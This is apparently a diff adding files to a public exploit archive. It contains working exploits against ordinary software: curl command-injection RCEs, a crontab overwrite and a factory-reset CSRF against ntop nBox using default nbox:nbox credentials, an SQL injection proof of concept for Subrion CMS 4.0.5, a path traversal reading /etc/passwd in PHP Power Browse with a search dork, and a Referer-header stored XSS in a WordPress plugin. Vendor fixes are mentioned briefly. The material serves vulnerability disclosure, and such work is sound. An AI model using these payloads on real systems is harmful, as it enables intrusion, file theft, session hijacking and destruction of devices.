RCE: POST against https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi with parameters interface=;touch /tmp/HACK;
|
||||
curl -sk --user nbox:nbox --data 'interface=;touch /tmp/HACK;' 'https://NTOP-BOX/ntop-bin/rrd_net_graph.cgi'
|
||||
|
||||
|
||||
|
||||
RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap
|
||||
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/pcap_upload.cgi?dir=|touch%20/tmp/HACK&pcap=pcap'
|
||||
|
||||
|
||||
|
||||
RCE (Wrapped in sudo): GET https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi¶ms=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22
|
||||
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/sudowrapper.cgi?script=adm_storage_info.cgi¶ms=P%22|whoami%3E%20%22/tmp/HACK%22|echo%20%22'
|
||||
|
||||
|
||||
|
||||
RCE: POST against https://NTOP-BOX/ntop-bin/do_mergecap.cgi with parameters opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit%200
|
||||
curl -sk --user nbox:nbox --data 'opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit 0' 'https://NTOP-BOX/ntop-bin/do_mergecap.cgi'
|
||||
|
||||
There are some other interesting things, for example, it was possible to have a persistent XSS by rewriting crontab with a XSS payload on it, but they fixed it in 2.5. However the crontab overwrite (Wrapped in sudo) is still possible:
|
||||
|
||||
GET https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON
|
||||
|
||||
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON'
|
||||
|
||||
|
||||
|
||||
The last one is a CSRF that leaves the machine fried, by resetting the machine completely:
|
||||
|
||||
GET https://NTOP-BOX/ntop-bin/do_factory_reset.cgi
|
||||
|
||||
curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_factory_reset.cgi'
|
||||
|
||||
|
||||
|
||||
Modules for metasploit and BeEF will come soon. I hope this time the issues are not just silently patched...
|
||||
|
||||
|
||||
|
||||
If you have any questions or feedback, hit me up in twitter (@javutin)!
|
||||
|
||||
|
||||
|
||||
Have a nice day!
|
204
platforms/php/webapps/40202.txt
Executable file
204
platforms/php/webapps/40202.txt
Executable file
|
@ -0,0 +1,204 @@
|
|||
Document Title:
|
||||
===============
|
||||
Subrion v4.0.5 CMS - SQL Injection Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1893
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2016-08-04
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1893
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
7
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Subrion is a full featured open source CMS written in PHP 5 & MySQL with many options. Here is the list of the most important features.
|
||||
You don't need to pay a single penny to start using Subrion CMS. It's not encrypted in any way so you can customize it per your needs.
|
||||
It's done to focus on the content management process. Start it hassle-free within just a few minutes and take care of the content.
|
||||
|
||||
(Copy of the Vendor Homepage: http://www.subrion.org/download/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a remote sql-injection vulnerability in the Subrion v4.0.5 content management system.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2016-08-04: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Intelliants LLC
|
||||
Product: Subrion - Content Management System (Web-Application) 4.0.5
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A remote sql-injection web vulnerability has been discovered in the Subrion v4.0.5 content management system.
|
||||
The vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms.
|
||||
|
||||
The sql-injection vulnerability is located in the `query` and ` show_query` parameters of the `.database/sql/` module POST
|
||||
method request. Remote attackers are able to execute own sql commands by usage of the insecure sql management tool request.
|
||||
The attack vector of the vulnerability is application-side and the request method to inject is POST.
|
||||
|
||||
The security risk of the sql-injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0.
|
||||
Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account.
|
||||
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] ./database/sql/
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] show_query
|
||||
[+] query
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The vulnerability can be exploited by remote attackers with privileged web-application user account and without user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: Exploitation
|
||||
<html>
|
||||
<head><body>
|
||||
<title>Subrion CMS - Remote SQL Injection PoC</title>
|
||||
<form action="http://subrion.localhost:8080/admin/database/sql/" method="post">
|
||||
<input query="-1'[SQL-INJECTION VULNERABILITY!]--" value="-1'[SQL-INJECTION VULNERABILITY!]--">
|
||||
<input show_query="-1'[SQL-INJECTION VULNERABILITY!]--" value="-1'[SQL-INJECTION VULNERABILITY!]--">
|
||||
<input exec_query="Go" value"Go"
|
||||
<button>Send POST Method Request</button>
|
||||
</body></head>
|
||||
</form>
|
||||
</html>
|
||||
|
||||
|
||||
POST /admin/database/sql/ HTTP/1.1
|
||||
Host: http://subrion.localhost:8080
|
||||
query=[SQL-INJECTION VULNERABILITY!]&show_query=[SQL-INJECTION VULNERABILITY!]&exec_query=Go
|
||||
|
||||
|
||||
--- SQL Error Exception Logs ---
|
||||
You have an error in your SQL syntax;
|
||||
Check the manual that corresponds to your MySQL server version for the right syntax to use near 'command `extras`' at line 1}
|
||||
|
||||
|
||||
--- PoC Session Logs [POST] ---
|
||||
Status: 200[OK]
|
||||
POST /database/sql/
|
||||
Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[subrion.localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Referer[/admin/database/sql/]
|
||||
Cookie[INTELLI_6321e8217b=f98078af3840ae5ba4a4800445924360; INTELLI_6321e8217b=f98078af3840ae5ba4a4800445924360; INTELLI_6321e8217b=f98078af3840ae5ba4a4800445924360; INTELLI_6321e8217b=f98078af3840ae5ba4a4800445924360; loader=loaded; INTELLI_a1ef1b4b28=63c87c36882a10136a627aea5a94a581; _ga=GA1.2.1118331789.1469788535; _gat=1]
|
||||
Connection[keep-alive]
|
||||
POST-Daten:
|
||||
__st[6a4bf637dc90a9d8dd203fff134f8140]
|
||||
query[-1'SQL-INJECTION VULNERABILITY!]
|
||||
show_query[-1'SQL-INJECTION VULNERABILITY!]
|
||||
exec_query[Go]
|
||||
Response Header:
|
||||
Date[Fri, 29 Jul 2016 10:38:22 GMT]
|
||||
Server[Apache]
|
||||
X-Powered-By[PHP/5.5.30]
|
||||
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
|
||||
Set-Cookie[INTELLI_6321e8217b=f98078af3840ae5ba4a4800445924360; expires=Fri, 29-Jul-2016 11:08:22 GMT; Max-Age=1800]
|
||||
Vary[Accept-Encoding]
|
||||
Content-Length[5329]
|
||||
Content-Type[text/html]
|
||||
|
||||
|
||||
Note: Use the permanent cookie to trigger the bug remotly on default setup without admin access credentials.
|
||||
Cookie: [f98078af3840ae5ba4a4800445924360] & [63c87c36882a10136a627aea5a94a581]
|
||||
|
||||
|
||||
Reference(s):
|
||||
http://subrion.localhost:8080/
|
||||
http://subrion.localhost:8080/admin/
|
||||
http://subrion.localhost:8080/admin/database/
|
||||
http://subrion.localhost:8080/admin/database/sql/
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The sql-injection vulnerability can be patched by usage of a prepared statement in the sql database tool POST method request.
|
||||
Parse and filter the parameter input of the query and show_query values. Disallow the usage of special chars to prevent further attacks.
|
||||
Escape the entries to ensure the context is secure transmitted via POST method request.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the remote sql-injection web vulnerability in the `query` and `show_query` parameters of the`/database/sql/`module is estimated high. (CVSS 7.0)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
|
||||
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
|
||||
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
|
||||
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
|
||||
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
|
||||
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
|
||||
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
|
||||
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
|
||||
|
||||
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
|
||||
|
19
platforms/php/webapps/40204.txt
Executable file
19
platforms/php/webapps/40204.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# Exploit Title: PHP Power Browse v1.2 - Path Traversal
|
||||
# Google Dork:
|
||||
intitle:PHP Power Browse inurl:browse.php
|
||||
# Exploit Author: Manuel Mancera (sinkmanu) | sinkmanu (at) gmail
|
||||
(dot) com
|
||||
# Software URL: https://github.com/arzynik/PHPPowerBrowse
|
||||
# Version: 1.2
|
||||
# Vulnerability Type : Path traversal
|
||||
# Severity : High
|
||||
|
||||
### Description ###
|
||||
|
||||
This file browser is vulnerable to path traversal and allow to an
|
||||
attacker to access to files and directories that are stored outside the
|
||||
web root folder.
|
||||
|
||||
### Exploit ###
|
||||
|
||||
http://site/browse.php?p=source&file=/etc/passwd
|
50
platforms/php/webapps/40206.txt
Executable file
50
platforms/php/webapps/40206.txt
Executable file
|
@ -0,0 +1,50 @@
|
|||
Stored Cross-Site Scripting vulnerability in Count per Day WordPress Plugin
|
||||
|
||||
Abstract
|
||||
|
||||
A Cross-Site Scripting vulnerability was found in the Count per Day WordPress Plugin. This issue can be exploited by an unauthenticated attacker and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
|
||||
|
||||
Contact
|
||||
|
||||
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
|
||||
|
||||
The Summer of Pwnage
|
||||
|
||||
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
|
||||
|
||||
OVE ID
|
||||
|
||||
OVE-20160717-0001
|
||||
|
||||
Tested versions
|
||||
This issue was successfully tested on Count per Day WordPress Plugin version 3.5.4.
|
||||
|
||||
Fix
|
||||
This issue is resolved in Count per Day version 3.5.5.
|
||||
|
||||
Introduction
|
||||
|
||||
The Count per Day WordPress Plugin shows reads and visitors per page, visitors today, yesterday, last week, last months and other statistics. A Cross-Site Scripting vulnerability was found in the Count per Day WordPress Plugin. This issue can be exploited by an unauthenticated attacker and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
|
||||
|
||||
Details
|
||||
|
||||
When manipulating the referer header by putting in javascript: it will be rendered on the admin page within the referers list as a a href attribute. When admin (or above author level) clicks on it the XSS gets executed.
|
||||
|
||||
Tags get stripped so it's not possible to execute the XSS directly on load. Single and double quotes are escaped, but can be worked around. Example:
|
||||
|
||||
Referer: javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
|
||||
|
||||
|
||||
The referer list shows the top 20. But its easy to get your attack referer in the top by just looping with unique x-forwarded-for ip's. By default referers are stored (but can be turned off in the settings of the plugin). Up to 150 chars of the referer are stored (can be changed to 500 max).
|
||||
|
||||
Proof of concept
|
||||
|
||||
GET / HTTP/1.1
|
||||
Host: <target>
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Encoding: gzip, deflate, sdch
|
||||
Accept-Language: en-US,en;q=0.8,nl;q=0.6
|
||||
x-forwarded-for: 1.1.1.5
|
||||
Referer: javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
|
||||
Connection: close
|
Loading…
Add table
Reference in a new issue